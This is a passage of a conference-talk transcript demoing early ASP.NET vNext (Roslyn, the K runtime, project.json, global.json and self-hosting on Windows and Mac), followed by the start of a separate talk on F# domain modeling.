everything's open source from this point on unless there's a really good reason not to. Is that pretty much it? Damien's nodding. Damien and David are here to make sure if I lie, that we like, no, that's a lie. They will actually speak up. So I will look to them occasionally and I'm like, am I supposed to say that? But the thing is that everything's in the open now, right? Yes, everything is open. That was so sincere. Damien, who is a better program manager than I, was like, yes, everything is open at Microsoft. That was very, very, totally, yeah. Oh, oh, oh. I find your lack of openness disturbing. So in case you hadn't heard, the compiler is in, the.NET foundation. Everything that we're doing with.NET Vnext is on GitHub. It's on GitHub slash ASP.NET. And you can watch the check-ins. This is just an important thing to remind because sometimes there's projects at Microsoft where it's not open source, it's source opened. Which is a look at that, don't touch. It's more of a window shopping. You're not actually allowed to do anything with it. You can really watch them checking stuff in. Fowlers checking stuff in on airplanes all the time, aren't you, Fowler? Pretty much. So everything is going to be modular. Everything's open source with contributions. We're already getting contributions for stuff and it's all going to be cross-platform. And the thing that's really significant about it, though, is this modularity is going to not just be the classes and the things that make ASP.NET and ASP.NET, but it's going to go down to the CLR and the runtime itself. So we're going to try some stuff that might surprise you. Blah, blah, blah. This is really kind of all waste of time. It'll run on Windows and Mac and Linux. Yada, yada, yada. There's really anything here to talk about? Okay, so client apps and web apps are different. Right now, though, they're using the same CLR. 
The CLR that you're having in Azure is the same CLR that you're running your WPF app on. And those things might have different needs, right? Something that's running on my laptop is going to behave different and you're going to want it to be a different CLR than what's going on in the server. So we're going to kind of make that a little bit different. We have one purpose with store apps and WPF apps and console apps and things like that. Another purpose is going to be server-side apps. So we're going to have specialized CLR on the client side, so you're going to have things like native compilation. You've heard about.NET native. Compiling all the way down to basically, you know, native code using the C++ optimization all the way down. So then you'll be able to bring something down from the store, the Windows store, that is written in C-sharp and it's a native app. And it will run full speed and there's no jitter involved. On the cloud side, though, you're going to want to have side-by-side. And this is really, really important. This is the most interesting innovation, I think, is the idea that I could have a half dozen applications on my server, all different versions, not the different versions of the apps, but different versions of ASP.NET and not just ASP.NET, but different versions of the CLR itself. And I could change one and not break anything. And that's so important when you think about cloud scenarios where you've got a lot of server density. Now, underneath that, though, you're going to have common stuff. You're going to have common NextGenJet. You're going to have the common compiler platform, Roslin. And that Roslin concept is a really important one because you can plug that in right now, actually. You can take Roslin on a, what we call a Dev12 machine. Let's see if we've got something lying around here. This might work. I've got, this is Visual Studio 2013, what they call Dev12 internally. And let's see if this has what I need to see. And I've installed the Roslin preview. So this is not ASP.NET vNext that I'm showing you here. This is me just installing a preview. And if I go here in Tools and go Extensions, la, la, la, la, la, Roslin. So that's just there as an add-on. And I can just disable it. So the compiler has been brought down as what's called a Visix, an extension. And I can turn it on or off. What this allows me to do though, is start using C-sharp 6 stuff in my existing applications. So I say C-sharp 6 features. Here's the Damian who used to work for us, having a list of possible features. This is not final yet, right? They're discussing what they're going to do. So some of the cool things that they're talking about are, for example, here's how you would have a point class before. You've got some privates, you've got a constructor, and then you take the parameters off the constructor, and you stuff them into the private, right? Yay. That is what it would look like in C-sharp 6. So let's say I want to play with that feature now, but I don't want to break anything. I want to do it in a non-threatening way. This is the Visual Studio that you have now. All I have to do is add that Roslin feature as an extension. And then here is the way I did it before, the point class, and I call that pointLame. And then here's point. So here we've got the get like this inside here, and then we're assigning the x, all happening within the constructor. But these are public properties that actually have scope outside this class. 
Another examples are they're talking about things called method expressions. This is not done yet, but they're talking about doing something like this. If I went and turned this off, extensions, Roslin, disable, restart, start that up again, do-do-do-do. And then go and open that exact same project. Notice how I'm going to get curly braces all over the place. So it's freaking out, because it's like, that's totally not valid C sharp, because it's not. It was a minute ago. So that's one aspect of the modularity. Again, this isn't ASP.NET VNX. It's really important to keep those things separate, but it speaks to this larger movement towards modularity that we're going towards. So if you look at the bottom part there, those run times and compilers and innovations and things like that are going to sit underneath both of these things. So you can have the desktop CLR. You could have that. In this case, I was on.NET 4.5 or 4.5.1, turning Roslin off, turning it on. Didn't have to worry about destroying my machine. Nothing got put into the GAC, and I got to play with the new stuff. We've also got Roslin code DOM providers that allow you to use this in your ASP.NET web forms apps and your razor pages, which is really cool. And it also has a really speed improvements, right? What do you mean? Is it some x? 30x, 60x? In complex x up into the tens of times faster. So that's an order of magnitude? It can be an order of magnitude faster. So that's cool. That is good. That's an order of magnitude, right? Ten is an order of magnitude. Yeah, that's cool. Like a Kroner is an order of magnitude from a dollar. I don't think I'm doing that right. No, okay. Blah, blah, blah. All right, let's see some cool stuff. You don't mind me blah, blah, blahing over all these slides, do you? I'll give you the deck. There's nothing in here. All right. See, I've already got like right there, there was like a red card. Someone actually pulled a red card out from underneath their desk, and they're like, I want to see those slides really bad. Okay, so let's switch over here. Now, this is the Dev 14 CTP. This is the one that you can go and download now. This came out what, two days ago? This is the one that you are absolutely not supposed to install side by side as I have, because it will destroy the world, which it will. You should install this in a virtual machine. I will very likely have to torch this machine later today. Now, this is important though. CTP, this is me talking. CTP means super alpha built on David's computer. They call it community technology preview. It really should call it you have no business installing this. And if setup succeeds, you're a lucky person. But this is, it's either do that or wait a year or two before you get feedback. That's what we're trying to get you guys to understand. Some people don't like this. Some people are like, we just upgraded to 2013. I see this on Twitter all the time. We just upgraded. And now you put out 14. No, we didn't. We put out an early, early build of this thing that is pre-alpha. Like someone just picked a daily and said, that one mostly works. That's pretty much what happened, right? I mean, we're not kidding. And we gave it to you guys so that you can give feedback in the direction that we're going now. So don't freak out. You're not going to see this for a while. Okay. So let's do this. Let me make a new project. And I'm going to go and say new web app. And for now, vNext stuff, and don't worry about names. We'll figure the names out. 
They'll be dumb no matter what we end up with. They're going to be bad. So these here will end up inside of this one ASP.net world. And you'll say file new one ASP.net. And you'll have a choice about these things. But for now, they're done like this. So I'm going to go and say vNext application. And I'm going to hit OK. And this will chew for a little bit. Blah, blah, blah, blah, blah. Okay. Now, down, okay, there just said package restore in progress. So it's going and talking to the interwebs and bringing down whatever package it needs to. Chew, chew, chew. And we'll notice a couple of things off the bat. If I go to references, we see that that is, what's the word there? It's a kind of hierarchy. Okay. So it doesn't just have system dot whatever, right? So you go, oh, look how simple that is. It's wonderful. Ah! But these are nested dependencies. So this is a little bit more like node, right? So the idea is that there is a class of person who wants to think about things. We support.net four or five. Full stop period. They'll never open that up. And then there's another class of person who is going to say, well, we really, really need this to be different version or whatever, you know. And they're going to want to have full control. I choose to pretend that everything is okay. And other people are going to want to dig in there and figure out exactly what's going on. Now I can go here and right click and say properties. And then where it says active target framework. We don't know what this is going to look like. It may not look like this. Who knows? I can come here and I can pull this down and I can pick the core framework. Remember how we said there was going to be two? There's going to be the server framework and there's going to be the non-server framework, right? Damon, how do you want to say that? The desktop CLR. Yeah. Okay, so let's just make sure we understand. So I said that's the server framework and that's the not one. And he went like that. He said this is the cloud optimized. I said server. You said cloud optimized. And I said not server. And you said that you not server equals desktop. That's today. That's the CLR we know and love. Okay, that's correct. This is important. And that is something new and freaky. Right. You like that. Okay. So old and reliable, new hotness. Is that cool? All right. This is installed at the computer level. You have this now. This can be side by side. Like this has this is many things, but the thing that is most significant about it is it's side by side. And it's going to have things. It's going to it's going to have less than the desktop. You're not going to have system dot drawing. You're not going to have wind forms. This is for the server. There is less stuff in here. Okay. So it does less. So you might go and take your existing application and say, oh gosh, all of my chart rendering code broke. Yeah, because you don't have that now. Or this crazy thing I was doing in web forms doesn't work. Well, system dot web isn't there. So if you're doing straight web API MVC, it'll probably be able to be moved over with changes in name spaces and class changes. But this is breaking. This is important to understand. The desktop CLR is reliable and you can count on it. But now you've got a choice. An example would be that, you know, a line of business application with charts and graphs and a big administration thing. You might do it in web forms or MVC has a lot of dependencies. It'll keep working when we go forward. If you stay on the desktop CLR. 
But if I'm going to make a tiny little on the metal web API that's going to spit Jason around, that's going to that's a very different environment. Maybe I'm going to want to self host that running at the command line and have it talk Jason or talk XML. Those are very fundamentally different things. So we want ASP net to be able to do low level on the metal and really sophisticated line of business and everything in between. And that's why there's these two options. So let's try this crazy idea. And I don't know if this will work. So lower your expectations now. So let's go to users got desktop. And I don't know what new custom profile even means. That was clearly needed. So I don't know what that was for this will likely not work to. So I want to publish that. And come down here and desktop. This will likely not work to. And something's happening. The circle of patience is happening. There we go. View details. Do some stuff. Do some stuff. I'm seeing scary things happening. This folder is still empty. Things are showing up. Batch files are running. Publishing, publishing, publishing. It's very exciting. We don't know what this demo is, but it's going to be awesome. If it works, I don't even know what he's going to do. I'm captivated. Still going. Site published. So I've just published that. Not with FTP, not with Azure. So what I need now is someone with a Windows 8.1 laptop. Someone who's not him. No, I'm totally serious. Give me one of your laptops. Now. You didn't bring a laptop? That is so respectful as an audience. I would say most Americans would be like, I'm going to shut down my multiplayer Quake server and I will give you. Do you have a laptop? Okay, just throw it up here. It's 8.1. Yeah. He's going to put his credentials in. I also need your credit card. All right, let's see if we can hand it to me without me dying. This is what is this. Ubuntu? What is going on here? This is 8.1. Yeah. Okay. What is this thing? Extra battery. All right. So I'm going to sell that on eBay and I'm going to go and put a USB key with some viruses on it. We're going to go to the desktop here and I'm going to take this will likely not work too. And I'm going to copy it onto my USB key. And I'm going to look at your browser history and just learn a little bit about you and your preferences and things. So this is copying. This is about 80 megs. What you do inside of that is a packages folder. Okay. And the website. And that's copied. And I think that life is too short to safely eject USB keys. So I'm not going to. Live in on the edge. 220 volts. Does it work? Is this your computer? Is this like Dvorak? What's happening? All right. So let's see if I can do this without breaking your computer. All right. Take that thing in there. There we go. You're one of the left side people. Why would you put it on the left? What's wrong with you? This will likely not work too. So I'm double clicking. Is this touchscreen? Ah. And I'm going to go to Chrome. And I just double clicked on web.cmd. And that's that thing over there. And I see the little lights blinking. And I'm going to say local hosts. Oh. Maybe if I make more of those. 8080. 8080. You sure? All right. You sure? 5,000. 5,000? You sure? You're an idiot. Notepad. 5,000. Maybe if I hit enter a few more times. Is it working? What's that? It says started. It's kind of a downer. Fortunately, I called it this will not work too. Funny part is that I never tested it over here. Try again. I'm testing it over here as well. Started. It's Chrome's fault. 
And it's going to be a terrible thing. I'm going to add blocker. What the hell is going on here? Firefox? Wait a second. This isn't XP? What is this thing here? You have a fake start menu? Start 8? Are we sure this is 8.1? Are you pretty sure? Like it locks up. All right. Thanks for that. Hit enter here a couple more times. I'm going to declare your computer sucks. That sucks. Yeah, I'll give me your computer. You really want to do this like that? All right. I didn't know you went both ways. I don't even know which one of these do I use? Neither of these is going to fit where I need them to fit. I need DVI. I need DVI. Is that a little even? I got it handled. Tiny HDMI to slightly larger HDMI. Tiny HDMI, slightly larger HDMI to even larger DVI. Stack overflow? I knew it was their fault. That's what the error was? Okay. So that's David's fault. He will fix that. He'll be fixing that before the next thing. Hey. This is not touchscreen. No. All right. And you guys' keyboard is special. What's the umlot for? Blocked. Oh, it's not. How do I? There we go. Sorry, guys. I'm going to switch over to this one here called poo. Ah! We've got to do something while I wait for it to compile. That's you as a child, right? I have a picture of myself as a child on my desktop as well. Okay. All right. So the point there, and we'll want to take a look at your laptop and figure out what the hell is going on. I have the wrong defaults. Do you realize the irony in the term wrong defaults? Well, so you see your problem is you're running Windows right off the bat. Let's solve that problem right off the bat. All right. So I had the wrong. Well, actually, let's use this opportunity to look at packages.json. We can talk about that. So rather than just saying, hey, look, the demo worked, let's learn about this, shall we? And can I just get a little respect for this? I just want to make sure everyone's cool on that. Because, yeah, there you go. I'm keeping these, by the way. I did not have these in my collection. Seriously, what the? Here, give those to... Oh, he'll... Snake, it'll bite you. All right. We back up? All right, cool. So let's talk about the larger issue, and you guys try them in. So we've got an app here, and he says it'll never work. Probably won't. But let's talk about what an app is composed of in this new world. So I will run this and see if it will never work. It might not. Wrong version of something, I'm sure. Waiting, waiting, waiting. This is because I've upgraded my machine in different ways and changed some defaults. Yeah, he's like, I don't know. So this is important to point out, of course, how early this stuff is, right? None of this stuff is expected to work. And every time I do something crazy like that, where we publish to a USB key and then run it on another person's machine, that obviously has never had that stuff on it before, those guys are like, hey, that worked. Yeah, so you can see it's not working locally either as well. So these references here come out of this project.json. Project.json is kind of your NuGet packages file and your projects, your CS Proj all combined into one thing. It's a reimagination of these things. And one of the things that they're thinking is not working is that one of these values is wrong. Now, if I wanted to add a reference to something, I can go and say, right click, add reference today, right? And then a miracle happens, and that shows up in XML somewhere. 
In this world, you're going to be able to go like this and put in quotes, and then immediately I've got IntelliSense within my projects file here, and I can start writing something. And then as soon as I hit colon, you see I've got the choice of whatever the latest version of that is, or I could say, you know, star. And that would just get the latest one. So I could say, zero one alpha star, and that would pick up whatever the latest version is. So this is a lot more like Node. It's kind of like the Node style of doing things. Things are broken up into pieces, and I can pick exactly what I want and exactly the version that I want. Now, if we go over onto the USB key and look at the one that worked, we'll see what happened here. This web.cmd, you can see that we've actually got the x86 core server version 4.46 of the runtime. This is called the K runtime, and I don't know, we'll end up calling it something else maybe. And it goes and runs it and it says, I want you to go and host this application and run the web.cmd. And you notice that it's coming right out of this folder. It's coming out of packages and here. So if I go into packages, your initial reaction might be like, whoa, that's a lot of packages. This looks really complicated and scary. But remember what we talked about before. You can either go and install a multi-hundred meg runtime at the server level and have no control over it, and we might break it if a new version gets updated and every application in your system might get broken. Or you put up with more packages in your packages folder and a larger footprint on the app itself, but then you get absolute control and the guarantee that we can't break your apps. Or your coworker can't break your app. Or IT can't break your app. Just the fact that I was able to take his laptop and run a daily build of a next-gen application on his machine without having to install anything. I want to make sure you understood that demo. I didn't have to put anything on his machine. I'm guaranteed that I'm going to have that same experience when I go and put that up in the cloud. This is also going to enable you to use new stuff without talking to IT. Because you think about that. If you're working on Node or you're working on Rails, you don't have to check with IT before upgrading to a small build, a small version, but if you went from.NET 4.5 to 4.5.1, that probably involved a meeting at your company which IT then said no. And why did they say no? They said no, we don't want you to install 4.5.1 because you're going to break something. You're going to break something on another machine. And that engenders a sense of fear and a lack of trust. So the design of the next version of ASP.NET is meant to completely turn that on its head. And that's why I did crazy stuff like demos on USB keys. You will be able to use this stuff without fear. It will run the same no matter where you run it. And it was interesting when I ran it over there on your machine, I'm thinking, oh, it's clearly your machine. That's a silly thing for me to say, given that I'm selling you this thing right now. Because I ran it on my local machine and it didn't run. Because it runs exactly as it's going to run because it's entirely self-contained. So these packages in here include the compiler itself, the Roslin compiler, a totally different version of the compiler than the one that I showed you earlier. We've got three or four different versions of the compiler here. 
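For reference, the dependencies section being edited a moment ago looks something along these lines; the package names and the 0.1-alpha versioning fit the demo's era, but treat the exact strings as placeholders that changed from build to build:

    {
      "dependencies": {
        "Microsoft.AspNet.Mvc": "0.1-alpha-*",
        "Microsoft.AspNet.Diagnostics": "0.1-alpha-*"
      }
    }

The trailing star is the wildcard mentioned above: take the latest build that matches the rest of the version string.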
So imagine that you would be able to potentially fix a bug at the compiler level if you theoretically wanted to because it's open source and you could just have your own version of the compiler, which is pretty cool. It's got the runtime itself. Now you get the server and then the server core. So this is the K runtime for the desktop CLR and then the K runtime for the core CLR living next to each other here. And I can switch between them. And then I've got all the different versions of ASP.NET stuff. These things can be swapped out and changed and upgraded, which is going to give you a lot more flexibility. Now, this is all very early. So you will see reconciliation of these and batched into packages of packages and meta packages. So we don't know if this is the level of granularity that we're going to have things at. But it's going to be a little bit more organized. And you can see that at this level, I only have to think about that top, that first level of dependencies and then the rest of those things come back in. Now, David, what's something I could add that would not harm this application? Oh, it's already broken. So it doesn't really matter what I add, isn't it? That's a good point. Diagnostics. So I'll go and add diagnostic. See, so then you can see that it just made a call out to NuGet and I can go and pick different builds. Or pick star, I've assumed, but I'll just pick some random build. That's a bad idea. And then I'm going to bring up output and pin that. And then I'm going to just hit save. And it immediately sets up the packages and on the right hand side, it's going to update the references right off the bat. And when those show up, and this will get faster right now, it's actually hosted at myGet rather than NuGet.org. So it's hosted at a NuGet as a server company. So if you ever thought about doing a NuGet server of your own in your company, don't set your own up, just go to myGet and pay them and you'll have NuGet as a server for them. So diagnostics will show up where, guys? Fowler? Where would it be? Right there. So that just appeared there. Now, there'll be a gesture where I can right click and say add reference and it'll update the packages.json, but I want to point out the way that you can see those changes occur right off the bat. So just by hitting save, I'm going to refresh all of that. Now, this app is broken. This app is not. Let's run this and make sure. Now, the goal is to get this fast. How fast is the goal? So this is not under a second. So in order of magnitude faster. Right? It's not a joke. And the reason that it is not fast right now, because zero optimization has been done. This is about getting the fundamentals right. Speed comes later, so I'm not too worried about it. And the theory is going to be that it's going to get a lot faster because there's less work going on of a different kind. It's more in-memory work and less messing around on the disk work. So let's do this. I'm going to open up Explorer here, and you can see that it looks like a regular MVC application. Nothing particularly interesting going on. If I go to the bin folder, there's nothing in the bin folder, okay? Except that. That file was added. That was a key file. It's a file that changes the behavior of.NET simply by its existence. That was added in.NET 451. And the idea was to see if that file's there and have an entirely different loader process takeover. But there's no bin folder here. There's no stuff here. Can I delete these? So those are gone. 
And this application runs just fine. So it saw the change and it has to recompile, correct? And the compilation, though, is happening entirely in memory. That's hella slow, dude. It's my computer. It's this i7. Yeah. I think it may have been, it was time to scan for viruses, probably. So if I go to about... Certainly you know now that you can go and make changes in your views. Those get compiled and you can just hit F5. What you can do now, though, is make changes in code behind. So I can go back in here, make a change in a code behind, hit save, then hit refresh over here. And the entire application will compile and will change. And the goal is to get it down to a second. So it's basically make a change, refresh, make a change, refresh, make a change. That is the intent, okay? So you're going to get the speed of.NET and the memory management, the jitter, and all of those kind of next-gen things. And this is not in any way to disrespect Node or Rails, but their perspective on how they work from a runtime in a virtual machine is completely different from.NET. So if you could have native code speed and execution with a next-gen JIT working across multiple processors and using all the memory on your machine, and have the agility of a type and go, type and go, refresh, refresh, kind of an experience with no compilation, then you kind of get the best of both worlds. It's a much more agile experience. I don't know why these guys are freaking out, but that's actually not a big deal because it's a lie. There you go. That's fine again. Nope, and now it's freaking out. Why is that happening anyway? My machine? Yeah, I'm sure it is. And again, bin folder is not there. Now, back over looking at the project.json, there's this command here called web. I should be able to drop out to the command line into that folder. So let's do this. So here I am, and I can type KVM, not a confusing or a decision of a three-letter acronym at all. No one will ever buy a KVM switch again. And I can say KVM list, and that will tell me which versions of the.NET framework, the.NET core framework that we've got on this machine. So these are different versions of this K runtime. That includes the framework and the CLR itself. You can see I've got old builds and builds that are 40 versions higher, and then I can see which one is active specifically, and I can set aliases. So I've got this one set as default. So right now, 489 is the one Visual Studio is using. I can switch between them as I like. And then if I type K, K web in this particular folder will call this command. So K web is what we were doing when we ran that web.command before. And this is going to self-host this application, and I believe it's on 500. 5,000, sorry. So that is not IIS, right? That's being completely self-hosted. And this is more modular than even I think any of us realize, because you can swap out anything. Like we've got dependency injection built in that's coming with ASP.NET VNX. Don't like it, swap it out. You don't like the way that the middleware pipeline works or the diagnostic stuff works, swap it out. You don't like the Roslin compiler get a different version, swap it out. You don't like the way that we're doing hosting in IIS. You want to host it on Apache instead. We don't care. You want to swap out totally different operating system, knock yourself out. So if I switch over to the Mac. How long does this talk go to? 12 points left. There we go. So here. Sublime. There you are. So here's my Mac and I'm in Sublime. 
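As a quick reference before the Mac demo, the KVM and K commands used just now go roughly like this; the build number is a placeholder, not the exact string typed on stage:

    kvm list                          # show the installed K runtime versions (desktop and core CLR flavors)
    kvm use 0.1-alpha-build-0489      # make one of them active for this command prompt
    kvm alias default 0.1-alpha-build-0489
    k web                             # run the "web" command from project.json, self-hosted, no IIS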
And that's not too small. Okay, so over here we've got some interesting stuff going on. This is a hello world that David gave me. And this sitting in Sublime on a Mac. On the left hand side here, there's a couple things. There's the get location that it came from, right? And there is this global.json that I'll talk about in a little bit. And there's basically a selection of projects. Hello world, hello world MVC, this thing called no-win. If I go into the hello world web, we can see that this is a little hello world application. And it's very low level. It's not bringing in that whole stack of MVC stuff. This is going to be on the metal. And in this case here, it includes just Microsoft, ASPnet, HTTP. And it has more commands than just web. It's got options to use what's called the no-win HTTP server, a little tiny developer server. And another one called Firefly, that is a non-Microsoft entirely written in C-sharp HTTP server. So here on a Mac, I've got three different servers that I can potentially run on. This is just showing the ability that not only have we swapped out to mono, we swapped out to a Mac, we've got three different choices of what HTTP server I might want to run this stuff on. And again, if you want to run it on Apache or whatever, someone will do that for you. So let's go into hello world web. And take a look at what this guy has. So taking a complete juxtaposition from the full stack MVC to a very low level application, it can get as close to the metal as you want to, then where would I run K from it? This folder or somewhere else? This folder here? K web Firefly? Maybe? What port is that going to run on? 3000? And you just, it would be nice if it told me. That would be great. Like, yeah, I get a pull request. There you go. So then if I got rid of, got out of there and said K web, which is a same application hosted in an entirely different host, that'll be on 8080, the app works. So you have the ability to swap out any aspect of this thing. And we're going to have, potentially, the idea is with K, you'll be able to say K-dash-watch. Because that file watcher is the thing that says, oh, it's time to recompile this. So imagine a scenario where you're on a Mac, you're in Sublime or your favorite editor of choice. At the command line, you've run K watch, meaning watch the folder. You're making your changes and then you're hitting refresh. And it's that watcher that says, oh, recycle that and recompile, and you're going to get that nice experience. We're going to build a Sublime plugin. So you're going to have a Sublime package. So Sublime people are going to have a really great experience doing Razer and doing ASP.net on a Mac, and then deploy that off to Azure or whatever. You can go and run KPM and package up that application. So that publish gesture that I made in Visual Studio, and I right clicked and I said publish. That was a KPM pack where it was like, get this guy ready to run anywhere. So I could go and then build on the Mac and deploy anywhere I like. Let's try one more crazy thing. If we're doing crazy demos that won't work, let's go all the way. So switch back over to my PC here. And help me out with this one, David and Damian. And the reason I'm asking them to help me out isn't because I have no idea what I'm doing, but this stuff is changing a lot. Like, they got me up to speed and I was reading the code and then I took a vacation and I came back and like 40 builds had happened. And I was like, this isn't working and this isn't working. 
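The command-line workflow on the Mac side, roughly; the names after k come from whatever that project's commands section defines, so treat these as examples rather than the exact sample:

    kpm restore     # pull down the packages listed in project.json
    kpm pack        # bundle the app together with its runtime so it can be copied and run anywhere
    k web           # self-host the hello world app using the "web" command (port 8080 in the demo)

The Nowin and Firefly hosts are just additional named entries in that same commands section, run the same way with k followed by the command name.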
And I was like, what build do you want? And I was like, I don't know, 421. Is that cool? Oh, God, 421. We're on 486. Everything has changed. Really everything? So if you get involved now, understand that it is chaos every single day. Stuff is going to break because we're doing this in the open now. This isn't Microsoft hides out for a year and then drops it on you. Like we assume that we know what we're doing. This is everybody's involved, pull requests from the communities, arguments in issues on GitHub. It's all happening right now and things are broken. Now, when things are broken, sometimes you're going to want to be able to change the source. So here's my MVC application and I'll go and run this, right? And let's say that I want to build a MVC and it's broken and it's bugging me. I don't think this is acceptable. What do you do? Like how would you take this app and fix a bug in MVC? That would be chaos to do that today. What I can do with the next version here is I can go add new folder and I'll just call it global. Then I will right click and say add new item and we're going to make a global.json. This is a file that is bigger in scope than project.json. And inside that, if I remember correctly and you can correct me as sources and then have an array. Is it an array like that? Is that right? No? Well, then tell me how. How many of these do I have to have? There's a regular expression, right? Right? There you go. It's a real array. Oh, not a string array. There you go. And then do that. No semicolon? Oh, it's not C sharp. We should talk to Crockford about that. So over here in my GitHub folder earlier today, I cloned MVC. ASP.NET MVC. I just cloned it. I just went up to Git because that's where it is and I cloned it because it's open source. And I go in here and I go and say, GitHub slash slash, I've got to escape my stuff there, MVC. Okay? What? Oh, because it's in source. Now, or is it acceptable to you, David? Such a nice man. All right. So now some crazy stuff's happening. And then I wait. Sub-second. Right, David? What is happening right now? So it's going out and it's looking at some packages in Nougat, and of course they'll make this faster. But watch on the right-hand side. My solution has a project in it right now. It's got one project called Web Application 6 that references MVC. You know I reference MVC because if you look at the projects.json, there I reference MVC. But I also have MVC in a folder and I've just gone into my globals and I've said, hey, I've got this application over here and I want to do stuff. So. When does the magic happen, David? Wait for it. Should I wait longer? Save the start-ups, yes? What we're doing by having to go and save this or save that is to touch these files. And this is all because of various bugs. Is that good? Check what again? Check it again. Cool? So he says check global.json. That look okay? Source says. Oh, the white space. That must be it. Thank you. Clearly there was a white space issue in the json. No. Clearly close it and open it again. Of course. Who's fault is it now? Damien's fault. It's because you're at a conference. You should be working on this stuff. We'll try this one more time. All right. So it's thinking. Something's happening. Look at this. It shows showed up simply because we pointed to that source folder. This is the part that's a little bit confusing to people. We know what a NuGet package is today. It's a zip file or a NuPkag that David is trying. He wants that to become a thing. This NuPkag is a package, right? 
But a package is also a project reference. So why not make another folder a project reference? So when you say, hey, I need a dependency on ASP.net MVC, it doesn't necessarily mean I need a NuGet package. I need a NuGet package or you don't have a NuGet package. Maybe you have source. Where is that source? Oh, it's over here. The source in the folder overrides any NuGets that I have. So then why not go into like view results, which is a deep inside of MVC itself. And every single time that we spit out a view, right before we render the view, why don't we say, uh, poo? Why not, right? This is the actual source for MVC, all of MVC. Okay, so then let's take a look at this. Now, again, the goal is to make this work such that I could be in MVC making changes in MVC proper and just hit refresh. When you hit control shift B in the next version of ASP.net, it does not build. It'll say it's building, it's a lie. It is actually spell checking. It does the compile so it can tell you the syntax errors, but there's no build step. There's no build step. So now here, I've changed the source code for MVC myself to change that. And if I wanted to switch it back, I can just remove that, hit save, and hit refresh. All of MVC compiles, all of my app compiles, and the whole thing just works. And if I wanted to go and remove that global as JSON and switch back from source over to the packages, then that would work as well. So this is the direction, ta-da, sub second, any minute. This is the direction that we're going with ASP.net. We're going to take a break. We'll come back, and it's going to be an hour of answering questions with code with Damian and David. Thank you very, very much. APPLAUSE...........
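(For reference, the two JSON files driving that demo have roughly these shapes. The project.json holds a "dependencies" section plus named "commands" such as web, nowin or firefly that pick a host; the global.json adds a "sources" list of folders whose projects override any NuGet package of the same name, which is what let the cloned MVC source take over above. The sketch below shows only the global.json, and the folder path is a made-up example, not the one from the demo.)

    {
        "sources": [ "C:\\github\\mvc\\src" ]
    }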
|
It’s an exciting time for ASP.NET. What does the next version of Visual Studio and ASP.NET bring to the world of web development? Where does ASP.NET fit into the world of HTML5? What is One ASP.NET and how does it affect you? What role will MVC and WebForms play as technologies like SignalR, Web API and SPA gain traction? Will it all snap together in a way that makes sense? There's the cross-platform story, Roslyn, a new CLR and more. Join Scott Hanselman as he shares some internal documents, future thinking, open source, and exciting surprises about the future of ASP.NET.
|
10.5446/50868 (DOI)
|
Okay. Can everyone hear me okay? Up all the way at the back. Can you hear me? Yeah. Yeah. Okay. Good. Right. So this talk is domain driven design or domain modeling with the F-sharp type system. It's not really, I'm not going to go through a lot of domain driven design. It's more about how can you construct a domain model with the F-sharp type system. So I'm going to be explaining about algebraic types and how you can use that for designing. So a little bit of domain design, but mostly about the F-sharp type system and algebraic types. So hopefully that's what you're interested in. So I'm going to start with a challenge here. How many things are wrong with this design that you see on the screen? So you probably have seen this kind of code, millions of times. It's a very simple contact or a person. There's a first name, middle initial, last name, an email address, and a flag to say whether the email address has been verified by sending the contact to an email to verify. So you might think, well, I'm not going to say it's about syntax. I'm actually talking about from a design point of view, how many things are wrong with this code? And I think you'll find there's quite a number of things wrong. Hopefully I'll surprise you with some of the things that I'll say. So before we start on that, though, let me just talk about the software development process. And just like any process, there's an input, and there's the process, and then there's the output. And one of the things that we do in conferences like this is we normally talk about the process, which is the coding and the testing and the tooling and continuous integration and continuous deployment and all these things. I think one of the problems with that is there's this well-known truism, which is if you have garbage in, you get garbage out. So we tend to focus on the process, but really what we should do is focus on having less garbage coming into the process in the first place. So what I'd like to do in this talk is really focus on reducing the amount of garbage that comes in and then hopefully that reduces the amount of garbage that comes out. So reducing the amount of garbage that goes in is really the design process. So if you have a good design process, you can actually guarantee good output. If you have a bad design process, all the best tools in the world will not necessarily guarantee a good output, or at least there's a lot of extra effort to guarantee that extra good output. So that's what this talk is about. How can we have good design and how can the language that you use help you with that design? And I think that F-sharp is actually an excellent language for design purposes, not for coding, for design. So here is our contact again, and I propose to you that this is actually a very garbage-riddled design. If you use this design, you might have lots of errors in your code that would be completely preventable if you use the different design. So the first question of this design, one of the reasons why this is not a good design, is it's not very clear which values are optional. So the middle initial probably is going to be an optional property or an optional field. The first name might be required, the last name might be required, the email address might be required. It's not clear from this design. So when it comes time to coding, you won't actually know. So there's going to be a communication gap straight away between coding and the design. Now you might code it so it's optional, but that's going to be buried in your code. 
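For reference, the design being picked apart here looks roughly like this; the talk shows it as a C#-style class, but it is sketched below as an F# record, the language the rest of the talk uses, and the field names are approximations:

    type Contact =
        { FirstName: string
          MiddleInitial: string
          LastName: string
          EmailAddress: string
          IsEmailVerified: bool }

Every field is a bare primitive, which is exactly what the questions that follow poke at.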
And when someone else comes along, they're going to have to look at your code to find out whether it's optional or not. So in this case, the middle initial is optional. It'd be nice if we could somehow put that optionality into the design itself. What about the constraints? So if we take the first name, it says it's a string. So does that mean you can put two billion characters into the first name? Can you have line feeds in the first name? There are constraints on the first name, which a string does not represent. Now again, you probably have some validation logic in your code, but that's in the code. Can we actually represent that in the design? So in this case, the string is not allowed to be more than, say, 50 characters. What about which fields are linked together? So what I mean by that is in terms of concurrency: if one person updates the first name and another person updates the last name at the same time, that's going to be a concurrency error. But if one person updates the first name and someone else updates the email, that might not be a concurrency error. Is there a way of communicating that through this design? In this case, it's pretty obvious that the name part is separate from the email part. And finally, what's the domain logic? So we have this IsEmailVerified flag. That means I sent you an email and you clicked on it, so I know that you actually are the owner of that email. But where is that logic in this design? I mean, that's just a boolean. Anybody could set it to true or false. I mean, I've called it something, but the logic is not encoded in the design. So in this case, the logic is that if the email is changed, I have to reset it to false. If you change your email, I have to re-verify you. So here are all the questions again. Which values are optional? What are the constraints? Which fields are linked? And what's the domain logic? And I think that F-sharp can actually help with all of these questions. So, domain modeling with the F-sharp type system. My name's Scott Wlaschin. My Twitter handle is ScottWlaschin, very cleverly. I have a website called fsharpforfunandprofit.com. And I have a consulting company called FPBridge. If you want these slides, go to fsharpforfunandprofit.com; the slides will be there and some other links will be there too. And I'll post the video there too when it's ready. Right, so domain-driven design. How many people have read Domain-Driven Design? Most of you? Yeah. So the main quote from domain-driven design is that you focus on the domain and the domain logic rather than on the technology. So you're trying to capture something in a way that anybody can understand. Any business person can understand it. It's not about writing it in code. It's not about using clever technologies. It's about communication, really. So domain modeling and DDD is a quite big topic. Functional programming is another quite big topic. This talk is really going to be on the overlap 